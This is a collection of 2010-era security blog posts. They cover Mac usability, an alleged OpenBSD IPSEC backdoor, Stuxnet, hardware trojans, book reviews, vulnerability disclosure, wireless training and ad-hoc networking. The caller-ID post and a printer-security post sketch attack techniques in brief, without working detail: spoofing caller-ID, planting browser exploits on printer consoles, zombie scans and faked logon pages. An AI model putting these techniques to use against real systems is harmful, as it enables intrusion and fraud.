New computers – Mac (nets)

One of my Mac fanatic contacts, when I mentioned that I needed to connect to my old Windows machines, said that it was easy, you just had to open “Networks,” and there they all are!  Well, no, not quite.  Not by a long shot, in fact.  I knew there was something called “Finder,” which was basically the interface to the filesystem on the Mac OS.  I even figured where to find it, going to the icon on the extreme left end of the top of the screen, and figuring that choosing the “Finder” under that option would change the top menu items from the browser that was active at the time.

So, I found Finder, and I even found the Network part of it.  And I asked it to search for servers.  It didn’t find any.  So I asked it to find a specific server.  It didn’t find that, either, but the fact that the name I had specified popped up with “afp:” at the beginning gave me an indication that I had to specify a protocol for Windows machines.  I went searching in the help files, and, eventually, found it.  Not too hard to figure out that it was “smb:”  at least, not too hard once you know it.  I then was able to figure out, on my own, that specifying the machine name with a leading “//” was wrong, because the Mac helpfully and intelligently adds “//” to whatever you type, but is too stupid to figure out that “////” is wrong.


New computers – Mac (basics)

My father-in-law is a dedicated Apple fanatic (as are a number of my friends).  Since I had an MS-DOS machine when we first met, he tagged me as an IBM person.  (It was vain to point out that, although I had once installed a Baby 36 for a charity, I did not, in fact, have a System 360 installed in the non-existent basement of my apartment.)  He eventually figured out that Microsoft made the operating system, but, even though I have worked on (among others) a predecessor to AOS(VS), Apple DOS, UNIX, TOPS-10, VMS, JCL, and CP/M, and make no secret of my frustrations with Windows, he still considers me to be one of “the enemy.”

Well, I’ve always wanted to have a crack at Macs.  I got the first one installed in one company I worked for, over twenty years ago, used it for a while, and, despite the frustrations, was still interested in getting one of my own.  So, this year, while I had the need to update at least two machines, and since the price had come down from “completely-out-of-the-question” to merely “obscene,” I decided to get one.

The experience has been interesting.  I shall, no doubt, have more to say about aspects of operation in the future, but it has been an education to get a new Mac (a MacBook Pro laptop) and take it out of the box.

To give credit where credit is due, I’ve got to say that I’ve been impressed with the performance of the Mac and the Safari browser on the Web, which is what I’ve done with it so far.  The overall design is nice, of course.  I like the battery life (so far), and the “sleep” mode performance.  The machine recognized a generic mouse I plugged into it, and happily connected to the Internet when through a wired LAN.  The minimal (well, OK, slightly more than minimal) experience I’ve had with Mac OS X was quite sufficient to get me started on the machine, and I’ve even managed to puzzle out some things with the help of the “Help” system (but more on that later).

The big thing with Mac advertising, and Mac devotees, is that the Mac is easy to use “right out of the box.”  And, yes, that is partially, and possibly even mostly, true.  But not completely.

The reason that I needed to plug in a mouse was that I could not figure out how to “choose” or activate something with the trackpad.  I could move the pointer around, no problem, but then there were no buttons to push.  Tapping didn’t work.  I remembered seeing people tapping hard on the trackpad on Mac laptops, so I tried that.  Sometimes it worked, and sometimes it didn’t.

Experienced Mac laptop users will be smirking, of course, knowing what I eventually found out.  You don’t tap the trackpad, or even tap it hard.  You press, deliberately, and you can actually feel a detent “click” when you’ve pressed hard enough.  (And, of course, whatever you wanted to activate gets activated.)  This is sort of implied in the documentation (when I found it), but even there isn’t really made clear.  And it certainly isn’t “intuitively obvious.”

Ah, yes, the documentation.  Once you’ve figured out how to open up the box the laptop comes in, you take the laptop out of the clear cellophane “envelope,” and open it up.  Since it is shipped with the battery charged, as soon as you take the protective foam sheet off the keyboard, and figure out the power button (not *too* hard, if you’ve got good eyes: white on silver is pretty, but not exactly clear) things start happening.  Once you’ve gotten over the excitement, you may notice that there are power cords in a bay at the back of the box.  You are less likely to notice that there is a black cardboard envelope nestled into the black packing material at the front of the box.  Pulling on a tab in just the right way starts to loosen this, although you still seem to have to find a finger hole in the envelope in order to get it out, and then figure out how to open it.  Once you do, you will find a brief booklet which does tell you which of the two power cords is actually a power cord, and which is a mere (and very short) extension cord.  It also tells you a few other things that would have been handy, had I not already figured them out by trial and (mostly) error.  (There is also a CD or DVD which I haven’t yet had the time to try out.)

OK, some of the design is great.  (Not insanely, but great.)  Not all of it.


FBI Planted backdoors in OpenBSD IPSEC?

Not sure what to make of this yet:

“FBI Added Secret Backdoors to OpenBSD IPSEC”

Theo De Raadt seems to be ambiguous about this:

It is alleged that some ex-developers (and the company
they worked for) accepted US government money to put backdoors into
our network stack, in particular the IPSEC stack.  Around 2000-2001.


I refuse to become part of such a conspiracy, and
will not be talking to Gregory Perry about this.


Who’s behind Stuxnet?

Stuxnet is a worm that focuses on attacking SCADA devices. This is interesting on several levels.

First, we get to see all of those so-called isolated networks get infected, and wonder how that happened (here’s a clue: in 2010, isolated means in a concrete box buried underground with no person having access to it).

Then, we get to see how weak SCADA devices really are. No surprise to anyone who has ever fuzzed one.

After that, we get to theorize on who’s behind it and who is the target. What’s your guess?


Reflections on Trusting Trust goes hardware

A recent Scientific American article does point out that is is getting increasingly difficult to keep our Trusted Computing Base sufficiently small.

For further information on this scenario, see:  [1]

We actually discussed this in the early days of virus research, and sporadically since.  The random aspect (see Dell problems with bad chips) (the stories about malware on the boards is overblown, since the malware was simply stored in unused memory, rather than being in the BIOS or other boot ROM) is definitely a problem, but a deliberate attack is problematic.  The issue lies with hundreds of thousands of hobbyists (as well as some of the hackers) who poke and prod at everything.  True, the chance of discovering the attack is random, but so is the chance of keeping the attack undetected.  It isn’t something that an attacker could rely upon.

Yes, these days there are thousands of components, being manufactured by hundreds of vendors.  However, note various factors that need to be considered.

First of all, somebody has to make it.  Most major chips, like CPUs, are a combined effort.  Nobody would be able to make and manufacture a major chip all by themselves.  And, in these days of tight margins and using every available scrap of chip “real estate,” someone would be bound to notice a section of the chip labeled “this space intentionally left blank.”  The more people who are involved, the more likely someone is going to spill the beans, at the very least about an anomaly on the chip, whether or not they knew what it did.  (Once the word is out that there is an anomaly, the lifespan of that secret is probably about three weeks.)

Secondly, there is the issue of the payload.  What can you make it do?  Remember, we are talking components, here.  This means that, in order to make it do anything, you are generally going to have to rely on whatever else is in the device or system in which your chip has been embedded.  You cannot assume that you will have access to communications, memory, disk space, or pretty much anything else, unless you are on the CPU.  Even if you are on the CPU, you are going to be limited.  Do you know what you are?  Are you a computer? Smartphone?  iPod?  (If the last, you are out of luck, unless you want to try and drive the user slowly insane by refusing to play anything except Barry Manilow.)  If you are a computer, do you know what operating system you are running?  Do you know the format of any disk connected to you?  The more you have to know how to deal with, the more programming has to be built into you, and remember that real estate limitation.  Even if all you are going to do is shut down, you have to have access to communications, and you have to a) be able to watch all the traffic, and b) watch all the traffic, without degrading performance while doing so.  (OK, true, it could just be a timer.  That doesn’t allow the attacker a lot of control.)

Next, you have to get people to use your chips.  That means that your chips have to be as cheap as, or cheaper than, the competition.  And remember, you have to use up chip real estate in order to have your payload on the chip.  That means that, for every 1% of chip space you use up for your programming, you lose 1% of manufacturing capacity.  So you have to have deep pockets to fund this.  Your chip also has to be at least as capable as the competition.  It also has to be as reliable as the competition.  You have to test that the payload you’ve put in place does not adversely affect performance, until you tell it to.  And you have to test it in a variety of situations and applications.  All the while making sure nobody finds out your little secret.

Next, you have to trigger your attack.  The trigger can’t be something that could just happen randomly.  And remember, traffic on the Internet, particularly with people streaming videos out there, can be pretty random.  Also remember that there are hundreds of thousands of kids out there with nothing better to do than try to use their computers, smartphones, music players, radio controlled cars, and blenders in exactly the way they aren’t supposed to.  And several thousand who, as soon as something odd happens, start trying to figure out why.

Bad hardware definitely is a threat.  But the largest part of that threat is simply the fact that cheap manufacturers are taking shortcuts and building unreliable components.  If I was an attacker, I would definitely be able to find easier ways to mess up the infrastructure than by trying to create attack chips.

[1] Get it some night when you can borrow it, for free, from your local library DVD collection.  On an evening when you don’t want to think too much.  Or at all.  WARNING: contains jokes that six year olds, and most guys, find funny.


Caller-ID spoof and voicemail

It’s easy to spoof caller-ID with some VoIP systems.  There are a few Websites that specifically allow it.  It’s a little harder, but geekier, to spoof or overflow caller-ID with a simple Bell 212A modem: it’s transmitted with that tech between the first and second rings of the phone.  (Since most people have caller-ID these days, many telcos don’t play you the first ring.  Since we don’t have caller-ID, we often get accused of answering the phone before it rings.)  (Of course, the rings you hear on the calling side aren’t necessarily the rings heard on the other end, but …)

Apparently AT&T allows immediate access to voicemail on the basis of caller-ID.

Apparently, with Android phones, it’s also gotten even easier to spoof caller-ID.


REVIEW: “SSL and TLS: Theory and Practice”, Rolf Oppliger

BKSSLTTP.RVW   20091129

“SSL and TLS: Theory and Practice”, Rolf Oppliger, 2009, 978-1-59693-447-4
%A   Rolf Oppliger
%C   685 Canton St., Norwood, MA   02062
%D   2009
%G   978-1-59693-447-4 1-59693-447-6
%I   Artech House/Horizon
%O   617-769-9750 800-225-9977
%O   Audience i+ Tech 3 Writing 2 (see revfaq.htm for explanation)
%P   257 p.
%T   “SSL and TLS: Theory and Practice”

The preface states that the book is intended to update the existing literature on SSL (Secure Sockets Layer) and TLS (Transport Layer Security), and to provide a design level understanding of the protocols.  (Oppliger does not address issues of implementation or specific products.)  The work assumes a basic understanding of TCP/IP, the Internet standards process, and cryptography, altough some fundamental cryptographic principles are given.

Chapter one is a basic introduction to security and some related concepts.  The author uses the definition of security architecture from RFC 2828 to provide a useful starting point and analogy.  The five security services listed in ISO 7498-2 and X.800 (authentication, access control, confidentiality, integrity, and nonrepudiation) are clearly defined, and the resultant specific and pervasive security mechanisms are mentioned.  In chapter two, Oppliger gives a brief overview of a number of cryptologic terms and concepts, but some (such as steganography) may not be relevant to examination of the SSL and TLS protocols.  (There is also a slight conflict: in chapter one, a secure system is defined as one that is proof against a specific and defined threat, whereas, in chapter two, this is seen as conditional security.)  The author’s commentary is, as in all his works, clear and insightful, but the cryptographic theory provided does go well beyond what is required for this topic.

Chapter three, although entitled “Transport Layer Security,” is basically a history of both SSL and TLS.  SSL is examined in terms of the protocols, structures, and messages, in chapter four.  There is also a quick analysis of the structural strength of the specification.
Since TLS is derived from SSL, the material in chapter five concentrates on the differences between SSL 3.0 and TLS 1.0, and then looks at algorithmic options for TLS 1.1 and 1.2.  DTLS (Datagram Transport Layer Security), for UDP (User Datagram Protocol), is described briefly in chapter six, and seems to simply add sequence numbers to UDP, with some additional provision for security cookie exchanges.  Chapter seven notes the use of SSL for VPN (virtual private network) tunneling.  Chapter eight reviews some aspects of
public key certificates, but provides little background for full implementation of PKI (Public Key Infrastructure).  As a finishing touch, chapter nine notes the sidejacking attacks, concerns about man-in-the-middle (MITM) attacks (quite germane, at the moment), and notes that we should move from certificate based PKI to a trust and privilege management infrastructure (PMI).

In relatively few pages, Oppliger has provided background, introduction, and technical details of the SSL and TLS variants you are likely to encounter.  The material is clear, well structured, and easily accessible.  He has definitely enhanced the literature, not only of TLS, but also of security in general.

copyright Robert M. Slade, 2009    BKSSLTTP.RVW   20091129


REVIEW: “Cloud Security and Privacy”, Tim Mather/Subra Kumaraswamy/Shahed Latif

BKCLSEPR.RVW   20091113

“Cloud Security and Privacy”, Tim Mather/Subra Kumaraswamy/Shahed Latif, 2009, 978-0-596-802769, U$34.99/C$43.99
%A   Tim Mather
%A   Subra Kumaraswamy
%A   Shahed Latif
%C   103 Morris Street, Suite A, Sebastopol, CA   95472
%D   2009
%G   978-0-596-802769 0-596-802765
%I   O’Reilly & Associates, Inc.
%O   U$34.99/C$43.99 800-998-9938 707-829-0515
%O   Audience i- Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   312 p.
%T   “Cloud Security and Privacy”

The preface tells how the authors met, and that they were interested in writing a book on clouds and security.  It provides no definition of cloud computing.  (It also emphasizes an interest in being “first to market” with a work on this topic.)

Chapter one is supposed to be an introduction.  It is very brief, and, yet again, doesn’t say what a cloud is.  (The authors aren’t very careful about building background information: the acronym SPI is widely used and important to the book, but is used before it is defined.  It stands for Saas/Paas/Iaas, or software-as-a-service, platform-as-a-service, and infrastructure-as-a-service.  More simply, this refers to applications, management/development utilities, and storage.)  A delineation of cloud computing is finally given in chapter two, stating that it is characterized by multitenancy, scalability, elasticity, pay-as-you-go options, and self-provisioning.  (As these aspects are expanded, it becomes clear that the scalability, elasticity, and self-provisioning characteristics the authors describe are essentially the same thing: the ability of the user or client to manage the increase or decrease in services used.)  The fact that the authors do not define the term “cloud” becomes important as the guide starts to examine security considerations.  Interoperability is listed as a benefit of the cloud, whereas one of the risks is identified as
vendor lock-in: these two factors are inherently mutually exclusive.

Chapter three talks about infrastructure security, but the advice seems to reduce to a recommendation to review the security of the individual components, including Saas, Paas, and network elements, which seems to ignore the emergent risks arising from any complex environment.  Encryption is said to be only a small part of data security in storage, as addressed in chapter four, but most of the material discusses encryption.  The deliberation on cryptography is superficial: the authors have managed to include the very recent research on homomorphic encryption, and note that the field will advance rapidly, but do not mention that homomorphic encryption is only useful for a very specific subset of data representations.  The identity management problem is outlined in chapter five, and protocols for managing new systems are reviewed, but the issue of integrating these protocols with existing systems is not.  “Security management in the Cloud,” as examined in chapter six, is a melange of general security management and operations management, with responsibility flipping back and forth between the customer and the provider.  Chapter seven provides a very good overview of privacy, but with almost no relation to the cloud as such.  Audit and compliance standards are described in chapter eight: only one is directed at the cloud.  Various cloud service providers (CSP) are listed in chapter
nine.  The terse description of security-as-a-service (confusingly also listed as Saas), in chapter ten, is almost entirely restricted to spam and Web filtering.  The impact of the use of cloud technology is dealt with in chapter eleven.  It lists the pros and cons, but again,
some of the points are presented without noting that they are mutually exclusive.  Chapter twelve finishes off the book with a precis of the foregoing chapters.

The authors do raise a wide variety of the security problems and concerns related to cloud computing.  However, since these are the same issues that need to be examined in any information security scenario it is hard to say that any cloud-specific topics are addressed.  Stripped of excessive verbiage, the advice seems to reduce to a) know what you want, b) don’t make assumptions about what the provider provides, and c) audit the provider.

copyright Robert M. Slade, 2009    BKCLSEPR.RVW   20091113


Why Is Paid Responsible Disclosure So Damn Difficult?

So I’ve been sitting on an Apple vulnerability for over a month now, and I’m really starting to realise that maybe just sending the details to the Full-Disclosure mailing list and is the right way to go about disclosing vulnerabilities and exploits.

I initially contacted ZDI to see if they would be at all interested in buying the exploit off of me, as I spent a lot of time researching and finding this one, and I’d like to get something for my efforts. I am a firm believer in the No More Free Bugs movement, I understand and appreciate what ZDI are doing, but the fact that it took them just under a month to get back to me, is really not good enough to be very honest. If they don’t have the researchers, then advertise worldwide, instead of just US only. I know I for one, would be happy validating bugs all day, and this is the the type of work that can be remotely.
Yesterday I also submitted the same information to iDefense Labs Vulnerability Contributor Program (VCP), who claim to get back to me within 48 hours, so we’ll see how that goes. I will update this post as and I when I know more.

I also took the off chance of mailing Apple directly, and asking if they offer any rewards for vulnerabilities that have been found, and if so what they would be. I don’t have high hopes on Apple offering anything, but to be honest, I would prefer to  disclose this one directly to Apple. They however  have paid staff to do this work on a full time basis on all their products, so why aren’t they doing it properly, and I feel that anyone else finding bugs for them, should be compensated appropriately. However, I e-mailed them yesterday and recieved an automated response, so we see how long it takes them to respond to me as well.

This may end up being a rather long post, but let’s see. I’m also expecting to see quite a few interesting comments on this post as well, so come on people.

UPDATE 30/06/2010:

Received a response from iDefense last night,and a request for more info. So just over 24 hour response time, which is brilliant, I’m really impressed so far.

Recieved a response from Apple, and if I would like any reward (aside from credit for the find), then I was informed that I should go through ZDI or iDefense.



Like freedom of the press, ultimately, net neutrality is going to be reserved for those who own one.

Well, we’re getting closer.

Consider the case of cell/mobile phones.  The device is basically useless for communications, unless you have service through a provider.  They have the cell towers, and link through to the public telephone network.  You have to pay them, and they get to manage how calls are made.

(Just as a side issue, the more people who are subscribers in a given location, the worse chance you have of getting to make a call.  You get to be a victim of their [the telco's] success.)

Now, consider.  Cell phones are getting smarter all the time.  Already they can connect with (and via) wifi.  And we can build applications for them.  Recently I didn’t have Internet access for my laptop, and someone with an Android phone was able to set up a wireless access point for me, through his phone, and give me that connection.

OK, lets extend the routing a bit.  We’ve developed a lot of good routing protocols from building the Internet.  Let’s extend those to handle hops from phone to phone.  And, using voice over IP, and a few other technologies, pretty soon we can make calls without hitting a cell tower.

(And, bearing in mind technologies such as CDMA2000, note that, in opposition to the cell tower contention model, the *more* cell phones we put into an area under this model, the *better* our coverage and bandwidth is going to be.  The closer the devices are to each other, the faster [more bandwidth] they can talk to each other.)

Latency may be a problem.  Security (in terms of confidentiality) will definitely need to be addressed.  Long distance transmission will be a concern (although it’s rather amazing how many ideas start popping up as soon as those issues are raised).

Basically, any form of communication will follow from the same model.  With a bunch of cell phones where your only cost is the initial cost of the phone itself (no subscription, no usage cost, no long distance charges) it won’t take long for landline phones to be phased out.  Data communications, for any “store and forward” model (basically, anything other than streaming) will be even more efficient.  Maybe there will still be a place for the telcos: if you want faster service for real time streaming of content.  Of course, they’d have to be willing to set the price point for unlimited data low enough to be attractive …

However, we would now seem to be nearer the end than the beginning.  It’s mostly a matter of which platform to start with.  Google has demonstrated that it *can* term off applications, but, in this case, why should it?  Apple might want to jump in on the ground floor, but they turn off a lot more apps, and, in any case, it probably isn’t best to start with a phone where you have to hold your tongue (or your hand) just right to get it to work.


National Strategy for Trusted Identities in Cyberspace

There is no possible way this could potentially go wrong, right?

Doesn’t the phrase “Identity Ecosystem” make you feel all warm and “green”?

It’s a public/private partnership, right?  So there is no possibility of some large corporation taking over the process and imposing *their* management ideas on it?  Like, say, trying to re-introduce the TCPI?

And there couldn’t possibly be any problem that an identity management system is being run out of the US, which has no privacy legislation?

The fact that any PKI has to be complete, and locked down, couldn’t affect the outcome, could it?

There isn’t any possible need for anyone (who wasn’t a vile criminal) to be anonymous, is there?


OSWP – WiFu Training

I figured that the article that I wrote about the OSCP training that I did a while ago went down really well, I’d write another aritcle about the Offensive Security WiFu course, and the OSWP challenge.

As you probably remember I loved the OSCP challenge, what could possibly be better than a “live hack” to pass an exam!

The WiFu course, walks you through a lot of theory to start off with, and some may be very tempted to skip this section of the material, all I can say is don’t. You will gain a wealth of knowledge on the theory of wireless networking by going through this section. I thought that I already knew quite a bit about wireless networking and the security there of before I took this course, and well, let’s just say that I didn’t.

The course mainly concentrates on how to use the aircrack-ng suite of tools, and it does this in a manner where you actually learn the best way to use these for their relevant purpose. Some people may say, “Why not just read the help/man pages?” Trust me, I read the help/man pages, and I was quite proficient with the aircrack-ng suite before I did the training, now not only am I confident, I also know exactly what I’m doing.

The price of the course is once again extremely reasonable, it comes in at a measly $350, which is honestly nothing for the knowledge that you will gain from doing the course and taking the challenge. They also give you a list of recommended hardware for the course and for me that in itself was worth it. The wireless card I now posses is a lot better than my previous one, and the range really is phenominal.
In regards to the challenge itself, it’s amazing, no bells and whistles, just cracking wireless AP’s in a safe environment, but it’s the stuff that you need to know if you’re planning on doing this in the real world at all. You’re allowed 4 hours to complete the challenge, and this is more than enough time to make the odd mistake here and there.

I’ve read quite a bit on wireless security over the past year or so, and well, I could have saved myself a lot of time and effort by taking this course first. I know that I have easily spent over $350 on books alone on this topic.

If you’re at all currently involved in wireless networks and/or security and you’re thinking about doing some training, make it this course, as it will cover what you need to know.


KHOBE – the money link


In light of the KHOBE story, it seems a “darker” truth has been uncovered. Apparently the researchers have published their advisory in order to sell their research material to anyone who wants to know more than their limited technical details.

Why is this important? Well, it shows that when publishing their research, their intent was to:
1) Scare
2) Sell their software

While there might be legit reasons to check out their research, these new facts do bring the “KHOBE” paper into question, especially whether it is more noise than signal.

More details on the story can be seen here: KHOBE – no problem.

BTW, a bit of exaggeration by our colleague Aviram got him this week’s medal for PR scandal assistant.


The complexity of the ad-hoc network (and network research)

After months of intermittent attempts and research, I finally have a connection between two of my laptops, and an Internet connection to the one that is not physically connected to the wired LAN.

(Well, perhaps I might qualify that.  I appear to have a connection to the Internet, and I seem to have been successful at viewing a couple of Websites, and sending one piece of email.  It’s pig slow, and at the moment the mailer is trying to download some email.  It’s made enough of a connection to know that some email is there, but actually retrieving the email is taking enough time that I have been able to start to prep this posting in a browser window while I’m waiting.  I type very slowly, and, as of the end of this paragraph, it hasn’t yet successfully downloaded the second of seven messages.)

(The speed of the connection [although the computer says the connection is "Very Good"] may be due to the fact that I’m using  WEP with 104, rather than 40, bit key.  Don’t know how much difference it would make.  At the moment, having only just established the connection, I’m not about to mess with the settings to find out.)

However, as happy as I am to have the connection, the simple fact of it is not important enough to warrant a blog post.  No, the real point is all the trouble I encountered trying to find out how to make it work.  Following on from the complexity of any computing that I wrote about earlier.
As usual, I made my own life more difficult.  If all I wanted was a simple ad-hoc wireless network, that could be had for the asking.  Well, sort of.  A simple wireless network doesn’t do very much, unless you can share information from the drives, or share an Internet connection.  And that seems to be extra.

(Maybe.  At one point in the process, I had left one of the test wireless networks “on.”  And in one of my classes, one of my students managed to connect to it and get an Internet connection from the wired connection I had.  Random successes aren’t terribly useful, unless you can repeat them.)

Anyway, I have a wired network at home.  I have sharing enabled, so that I can copy materials from one machine to another.  At the moment, all of them run Windows XP.  (Yeah, I know.  I’ll get around to Linux sometime …)  I have (now) multiple laptops, and have to take at least one of them on the road for teaching.  And, of course, the mobile machines have to connect to all kinds of wired and wireless connections on the road.

Of course, the easy way would be to go to London Drugs and get a wireless router, connect it to the wired LAN, and fill in a few simple settings.  It’d probably take no more than a couple of hours, from beginning to end.  But I wouldn’t learn much about ad-hoc networking that way, and I’ve been getting more interested in it, particularly as a security concern, as I have been seeing that “computer-to-computer network” legend show up in more and more places.  (Especially with “Free Internet Connection!” as the network name.)

So, having a spare laptop (since, on a recent teaching trip, it decided to go spare on me), I figured it would be easy to set up a connection between that and the new one.

Actually, it was on the trip that I wanted to start the process.  There was nothing wrong with the old laptop (except that it was a Toshiba, and I’ve had two Toshibas in a row, and I will never again by anything made by Toshiba since they’ve given me nothing but grief for eight years) except that the power supply was becoming unreliable.  I bought a cheap (and non-Toshiba) netbook and asked for advice about connecting them via ad-hoc network in order to transfer the necessary files.

Well, lots of advice, but nothing actually worked, and I fell back on using the Passport external drive my wonderful daughters gave me that has been so useful in so many situations.  But it doesn’t do networking.

The friends gave me some starting points in terms of places to look for advice.  Microsoft, naturally.  There is a wonderful page at which provides clear explanations.  Only a couple of problems: it was written in 2002, so the dialogue boxes have changed.  This piece does talk about sharing an Internet connection, but it doesn’t mention the need to modify the default IP addresses, since everything seems to want to use as a base, and that leads to conflicts.  Bottom line: it doesn’t work.

Microsoft updated the information in 2006 at and the dialogue boxes are closer to what you’ll actually see these days.  After running through that one I tested it out, only to find that the network never does show up on “Available Wireless Networks.”  I’m not sure if this is because, if you choose WEP, and tell it not to broadcast the key, it keeps it hidden.  I did manage to connect to the network, and even seemed to be able to see other computers drives, and see something of the Internet, but all of the connections disappeared over time.  Again, this page says to use Internet Connection Sharing, but doesn’t provide the necessary detail to make it work.

All kinds of pages are out there, if you do a Web search, seemingly based on this same, limited, misinformation.  At the author seems to have given some thought to the issue of IP addresses, but not much. goes into a bit more detail on the IP addresses, but not enough, particularly in terms of the entries that have to be made in various places on various machines.

Finding all the places to make those entries is a trip in and of itself.  The Help and Support Center for XP Home Edition is no help.  At one point I was afraid that the multitude of entries for the various networks I’ve connected to in hotels, airports, and seminar hosting sites had something to do with it, so I went and deleted all of those “Preferred networks” I had accumulated over the years.  (Did you know that they were all still there?)

Lots of people are willing, and more than willing, to provide the benefit of their lack of experience.  I say this, since so many of the entries don’t actually work.  Terse, doesn’t work.  Slight tech detail, doesn’t cover sharing drive or Internet connection, doesn’t explain how to make new wireless network visible to “View available wireless networks.”  A touch more detail than above (5167281), mentions need to share Internet connection, mentions a dialogue button that doesn’t exist in the XP explanation.  Some detail on setting up the network, doesn’t completely work, nothing on sharing.  Some detail on setting up the network, doesn’t completely work, nothing on sharing.  Some detail on setting up the network, doesn’t completely work, nothing on sharing, does do XP and Vista.

Some of the advice is contradictory.  For example, I mentioned I was using WEP.  This is because some of the sites, such as and suggest that WPA and WPA2 can’t be used if the “host” for your ad-hoc network is running Windows XP (which mine is).  Of course, that might be old news, which might have been superceded by intervening upgrades.  But, with this level of information, how am I supposed to tell?

We are awash in a sea of information.  Except that some of the information is misinformative.  As John Lawton stated, the irony of the information Age is that it has given new respectability to uninformed opinion.  This can have rather significant consequences.  A recent CBC story notes that this may play into the May 6 stock market mini-meltdown.

So far, the best clue I received was from  I had frequently seen the “Bridge connections” option, but I somehow never thought to have two networks “selected” when I tried it.  Even then, I might have missed the opportunity.  I got the usual error message, but it suddenly dawned on me that ICS might conflict with it.  (Given that everybody else had been telling me to turn ICS on.)  So, I turned ICS off, and, sure enough, Bridge connections was happy to do just that.

I still have no clue what has been set, and where …


The complexity of the end-user’s computer

Over the years I’ve had to learn a lot about computers.  I’ve written device drivers for the All-in-One system under Vax/VMS.  I know what to do with MS-DOS’s AUTOEXEC.BAT and CONFIG.SYS files.  I’ve learned more word processors than I can remember the names of.  I was using UNIX when that was still a big deal.  Because of some some research that was important in the early days of computer viruses I know a question that will stump any computer forensics expert on the witness stand.

I’m a little afraid of my new netbook.  Within a few months I’ll need to buy a new desktop, and I know I’m going to be more afraid of it.

In the DOS days, I knew pretty much everything that was going on in it.  I knew the hardware, and the system files.  I even had a bunch of tools that would let me see the raw disk and memory.  It was tedious to do so, but it was possible.

Even when Windows 3 and 95 came out, I understood that this was simply a new interface.  I could still examine the system, and make sure everything was as it should be.  I could have confidence and assurance in the computer.  True, there wasn’t any serious protection on it, but, since I knew the full system, I could examine it regularly and make sure that nothing untoward was happening.

Then came Windows NT.  Extra protection on the system, but suddenly every time you turned the system on, 400 files (a number of them system files) got modified.  Change detection lost its security.

Then the later members of that family started adding ties into applications and back again.  And with Windows XP, for the first time, when a friend’s computer got infected, the only solution was to re-install the system.

Complexity is the enemy of security.   However, this goes deeper.  These days we have huge numbers of people using devices that are, as far as they are concerned, magic.  Don’t get me wrong.  I think magic is a lot of fun.  It’s just that magic seems to be defined as inherently unknowable, and these users are not only content with, but actually proud of, their ignorance.

This is dangerous.  When you assume that you cannot know, that seems to absolve you of any responsibility for even trying.  You punch the icons, and do things with no understanding of the consequences.

At the moment, I am trying to set up an ad-hoc wireless network between some of my machines.  I’m not having much luck.  I’ve researched the process, and had suggestions from friends.  I’ve been working at it, off and on, for months.  It still isn’t working.  I can’t find the information I need, either on the process, or in regard to the actual settings on my machines.

Ignorance isn’t bliss.  It’s dangerous.  If I, as a computer, communications, and security specialist of decades of standing, can’t get a simple (well, not quite that simple) network set up, how can we give advice to the novice users of the world on how to keep themswelves safe?


Printers, the forgotten threat.

It seems that in this day and age, people have finally grasped the concepts of why it’s a good idea to patch systems regularly, run an anti-virus application, and have funky network appliances like firewalls and Intrusion Detection Systems. Which is a really great move in the right direction.

One thing that I will never understand though is that people will spend a fortune on new security tools and appliances, adn they’ll forget the basics.

Please people, remember to lock down the items on your network that may seem insignificant to you, as nine out of ten times, they are a foothold for a hacker. A prime example of this would be printers, I have managed to obtain really sensitive information off of printers attached to networks in their default state in the past, and also waste valuable time and company resources.

Here are few of the things that i’ve done on various assignments over the years in regards to printers:

- Modify the default web console pages, and load them up with browser exploits

- Find valuabe documents saved as files on the printers

- Use the printers as zombie hosts for nmap zombie network scans

- Tie up the printer for a day or so printing out the contents of my hard drive

- Waste paper and ink from doing the above

- Leave obscene messages on the console display
- Shut down the printer and fake the logon page to accomplish all of the above

Here’s a pretty useful link for all those with HP printers on their estate as well.
So in going forward, please remember that if it’s attached to your network, it needs to be secured. Most printers these days come with security configuration options, but they have to be enabled, so take the extra 5 minutes to make the world a better place.